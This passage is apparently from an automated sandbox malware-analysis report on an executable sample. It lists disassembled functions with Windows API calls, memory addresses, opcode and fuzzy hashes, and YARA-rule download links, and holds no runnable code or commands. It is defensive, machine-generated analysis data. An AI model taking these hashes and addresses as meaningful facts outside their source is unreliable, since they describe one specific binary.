Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: 4e99df99e7301f39d701a276f02ef329721f1d5d609599a82ba0c959db36bcb5
Instruction ID: 5fd8f38291c32b1d9a8c259c524d2429805915a95c30d35f299d80458f247036
Opcode Fuzzy Hash: 4e99df99e7301f39d701a276f02ef329721f1d5d609599a82ba0c959db36bcb5
Instruction Fuzzy Hash: C3418232F187C183E750AB6195107A9A3A0FB94764F709336E65C07AE5DF6CA5E4C710

Function 00007FF78F499FC0 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF78F499FBC), ref: 00007FF78F499FD1
TerminateProcess.KERNEL32(?,?,?,00007FF78F499FBC), ref: 00007FF78F499FDC
ExitProcess.KERNEL32 ref: 00007FF78F499FEB

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 8770705702221fa6c619df89f3c2f6fa117b36761db68559c6d5aced1687d582
Instruction ID: 159c9e277c79297f57450790c4d08cd7238e678cd62fd3349881735c461de86b
Opcode Fuzzy Hash: 8770705702221fa6c619df89f3c2f6fa117b36761db68559c6d5aced1687d582
Instruction Fuzzy Hash: 2ED06730B4968642EA143F7258998F892157F48745FA0143AD80E073A7DD2DA84DC260

Function 00007FF78F49027C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF78F4902C0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF78F4903B7

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 7abeb8fe783ee1c87e05308e58bf334fc2d3c30e054771bdd4fe3d83d7422279
Instruction ID: 21e578bd615c1de317df19e50a571004ec740fef8a5cf041f2bf17b5d60d9798
Opcode Fuzzy Hash: 7abeb8fe783ee1c87e05308e58bf334fc2d3c30e054771bdd4fe3d83d7422279
Instruction Fuzzy Hash: C151C531B096D146EA64AE3A9400FFAA691BF44BA8FB44736DD6C477E6CE3CD441C620

Function 00007FF78F49C6F4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF78F49C88D), ref: 00007FF78F49C740
GetLastError.KERNEL32(?,?,?,?,?,00007FF78F49C88D), ref: 00007FF78F49C74A

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: b08d68fc7a6d73a6a6e4925e4a9dc39ae2e5fb86b78546c657aad159ae176ccc
Instruction ID: 203aad20d2de8aab30ed96e07886cd0cf16c86a52fd84d29c3170d56baca1b07
Opcode Fuzzy Hash: b08d68fc7a6d73a6a6e4925e4a9dc39ae2e5fb86b78546c657aad159ae176ccc
Instruction Fuzzy Hash: 0511BF72718BC281EA10AB25A4442A9A761BB44BF4FA40332EABD4B7E9CF7CD055C740

Function 00007FF78F4959FC Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF78F495911), ref: 00007FF78F495A2F
SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF78F495911), ref: 00007FF78F495A45

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: 01955a0fff7c8d04301666730a5fae84f6474b835d1eccbedadb07c42297a861
Instruction ID: 68c26b0444b4e9e98e1628c4363a82c4c34310d4fbea70a8ec63c2c3720cd346
Opcode Fuzzy Hash: 01955a0fff7c8d04301666730a5fae84f6474b835d1eccbedadb07c42297a861
Instruction Fuzzy Hash: 76118F3270C68685EB54AB51A4514BEF7A0FF85761FB00237EA9D869E8EF2CD054CB20

Function 00007FF78F4980BC Relevance: 3.0, APIs: 2, Instructions: 35timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF78F497F39), ref: 00007FF78F4980DF
SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF78F497F39), ref: 00007FF78F4980F5

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: a96e0719182de34ecec5e80d0f089f3d687da4b36ed0106fdd62851d0e6a23ab
Instruction ID: 603bff9970b9e042792e9da38cef14ba26726ce02a6897dc3c2d51a1e846c51e
Opcode Fuzzy Hash: a96e0719182de34ecec5e80d0f089f3d687da4b36ed0106fdd62851d0e6a23ab
Instruction Fuzzy Hash: 38017C3261C29582E750AB15E4016BAF7A0FB81B61FB00237E6AD025E8DB3DD014CB20

Function 00007FF78F49AF0C Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,?,00007FF78F4A3392,?,?,?,00007FF78F4A33CF,?,?,00000000,00007FF78F4A3895,?,?,00000000,00007FF78F4A37C7), ref: 00007FF78F49AF22
GetLastError.KERNEL32(?,?,?,00007FF78F4A3392,?,?,?,00007FF78F4A33CF,?,?,00000000,00007FF78F4A3895,?,?,00000000,00007FF78F4A37C7), ref: 00007FF78F49AF2C

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: bfb090b2684f97747e4e2589e7b79ee9627266c2664004addae3296ee4c2c8e2
Instruction ID: b42410086164377a948ba5d03231c2c91ebc7231fa3ae0e3eac399064006267e
Opcode Fuzzy Hash: bfb090b2684f97747e4e2589e7b79ee9627266c2664004addae3296ee4c2c8e2
Instruction Fuzzy Hash: 97E08670F096C242FF54BBB254454F591D17F88B01FE44436CC0E47262EE2C6899C230

Function 00007FF78F497E24 Relevance: 3.0, APIs: 2, Instructions: 12COMMON

Download Yara Rule

APIs

RemoveDirectoryW.KERNELBASE ref: 00007FF78F497E28
GetLastError.KERNEL32 ref: 00007FF78F497E32

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: DirectoryErrorLastRemove
String ID:
API String ID: 377330604-0
Opcode ID: 77acb875fdee33a12be4fb2ce6bc4fe447f240992313a5771dda9a679e1972f9
Instruction ID: 42a1bd2f5f877487fcba1cf9d8631ea5f2645d0e4a2ca602a01a9d6e84267574
Opcode Fuzzy Hash: 77acb875fdee33a12be4fb2ce6bc4fe447f240992313a5771dda9a679e1972f9
Instruction Fuzzy Hash: D1D0C930F5E58382EA54377218899B9A6903F44731FF00636C02D821F0DE2CA89A8231

Function 00007FF78F4986A8 Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE ref: 00007FF78F4986AC
GetLastError.KERNEL32 ref: 00007FF78F4986B6

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID:
API String ID: 2018770650-0
Opcode ID: 4ec91da2963a3bb04052aa88cca811f321d2e1bc87a8cb66c404f3cefda0a691
Instruction ID: 05e2ed3522f42647a04134bcb1e12180c29e0befb27f11489e88aacb5114006b
Opcode Fuzzy Hash: 4ec91da2963a3bb04052aa88cca811f321d2e1bc87a8cb66c404f3cefda0a691
Instruction Fuzzy Hash: 5ED0C930F1A58381E654377A08459F991903F54721FF00636C12D832F0DE6CA8998531

Function 00007FF78F49B11C Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,00007FF78F49AF99,?,?,00000000,00007FF78F49B04E), ref: 00007FF78F49B18A
GetLastError.KERNEL32(?,?,?,00007FF78F49AF99,?,?,00000000,00007FF78F49B04E), ref: 00007FF78F49B194

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: b40b4e21971f44bf7084fa7db8f9dedbad63d491ac625d0e9d3072d74158efd6
Instruction ID: 9837e0b96fb932410bbb62f6340f49a36731f04e136fccbecc78bea00fdc6ecc
Opcode Fuzzy Hash: b40b4e21971f44bf7084fa7db8f9dedbad63d491ac625d0e9d3072d74158efd6
Instruction Fuzzy Hash: 03212631B182C241FA90772494456FD92827F847E8FF44237DA6D473E2CE2CE849C320

Function 00007FF78F487D40 Relevance: 1.6, APIs: 1, Instructions: 141COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF78F488AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF78F482ABB), ref: 00007FF78F488B1A

_findclose.LIBCMT ref: 00007FF78F487F99

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: ByteCharMultiWide_findclose
String ID:
API String ID: 2772937645-0
Opcode ID: 6a56ecc169b874fe1e233505f6f9a5acf1cae56fd8a9bc6900038e6ac80cd412
Instruction ID: 129ae984909957d6d0561a44a1b3398b324ba929837e63bf7e99f57d557dcc43
Opcode Fuzzy Hash: 6a56ecc169b874fe1e233505f6f9a5acf1cae56fd8a9bc6900038e6ac80cd412
Instruction Fuzzy Hash: 9471A362E18AC581E611DB2CD5452FDB360F7A9B4CFA4E325DB9C12592EF28E2D9C700

Function 00007FF78F49C46C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF78F49C494

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 491d756dfbf5d606f7e783a7bab36e7eaa3001c20d525fc7b9da7dd63869e3d6
Instruction ID: e4c243fa1b6e911995838647a76982877dda228a0d14d6b28cc108fda3ac590c
Opcode Fuzzy Hash: 491d756dfbf5d606f7e783a7bab36e7eaa3001c20d525fc7b9da7dd63869e3d6
Instruction Fuzzy Hash: AC41B672B0828287FA24EB19A540AB9B7A0FB55B55FA00132D78D837A1CF6CE442C770

Function 00007FF78F4882B0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF78F48835A

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: f38816a1396df6c3fe935ea55d49c1b180c6beea1b2607ef6d81d6429394b577
Instruction ID: 14c697f8607ed99fcf57150b9ce3260517907a67e10d5fb9882f12d4060a6b11
Opcode Fuzzy Hash: f38816a1396df6c3fe935ea55d49c1b180c6beea1b2607ef6d81d6429394b577
Instruction Fuzzy Hash: 8A21A331B286D246FA50BB2269047FAE651BF85BD4FEC5432EE0D07786DE3EE041C620

Function 00007FF78F49BEFC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF78F49BF82

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 33c1c355f770a45dc32ec47b5556db51f5a056321d098f55ce731dda09118c74
Instruction ID: 7d54dce22697bb10e63bae3279fa2e824b8e2fea5618a93339fcffd40c7be65f
Opcode Fuzzy Hash: 33c1c355f770a45dc32ec47b5556db51f5a056321d098f55ce731dda09118c74
Instruction Fuzzy Hash: A0318131B1868285F751BB558441BFCA690BF84B61FB10237DA1D873E2DE7CE585C621

Function 00007FF78F499EF1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF78F499F1F

Part of subcall function 00007FF78F49A018: GetModuleHandleExW.KERNEL32 ref: 00007FF78F49A03D
Part of subcall function 00007FF78F49A018: GetProcAddress.KERNEL32 ref: 00007FF78F49A053
Part of subcall function 00007FF78F49A018: FreeLibrary.KERNEL32 ref: 00007FF78F49A07A

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: faec72fd928e516d4d760f4a89c99e996b8e0a7f11e884b20412009018256aa7
Instruction ID: 8aee16307e8b241f0c7484ee8197df944ef7995362acbd600d33a09e4226aa94
Opcode Fuzzy Hash: faec72fd928e516d4d760f4a89c99e996b8e0a7f11e884b20412009018256aa7
Instruction Fuzzy Hash: 2B218132B047858AEB24AF64C444AECB7A8FB08718FA44636E71C47AE9EF78D544C750

Function 00007FF78F4964A8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF78F49640D

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
Instruction ID: 1f95d9ed461cd1bdd15efeba996d552df86a6f739b169855eca8ab412cdd73fd
Opcode Fuzzy Hash: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
Instruction Fuzzy Hash: E3118431B1C6C181EA60BF519401AF9E2A0BF85B84FA44436EA4C47AA6DF7CD580D764

Function 00007FF78F4A6CAC Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF78F4A6CCF

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c0ad99c40d53020ccb328d164a39266f2dfd48b33636b9c7a3122610519525da
Instruction ID: 7dd8006ea55d4a03fb95260cfd9253850735e261f1cb645f74191a0db6318d46
Opcode Fuzzy Hash: c0ad99c40d53020ccb328d164a39266f2dfd48b33636b9c7a3122610519525da
Instruction Fuzzy Hash: C821A732619AC187DB61AF19E4407B9B7A0FB84B94FB44236EA5D476DAEF3CD401CB10

Function 00007FF78F4904FC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF78F490550

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e4e6805aeaf9884a68cba76bd798531beecc2a98c7129b287afec428eebc8cdc
Instruction ID: 0c57adeaad2e28e201e00d68afa53e62c230ee314df2c20f3ef83105df95a467
Opcode Fuzzy Hash: e4e6805aeaf9884a68cba76bd798531beecc2a98c7129b287afec428eebc8cdc
Instruction Fuzzy Hash: A9018271B0878141EA04EB6A99005E9E691BF85FE0BA84636DE5C57BE7CE3CD401C310

Function 00007FF78F497AB0 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF78F497AEE

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: af50f55acc611b54009b4ea4d598cf3424078558251c62237d26469a9987366e
Instruction ID: c43b5d8b3216b85f07106a124ee55d4543bd98547c3d970cd6b6de5a9db94f12
Opcode Fuzzy Hash: af50f55acc611b54009b4ea4d598cf3424078558251c62237d26469a9987366e
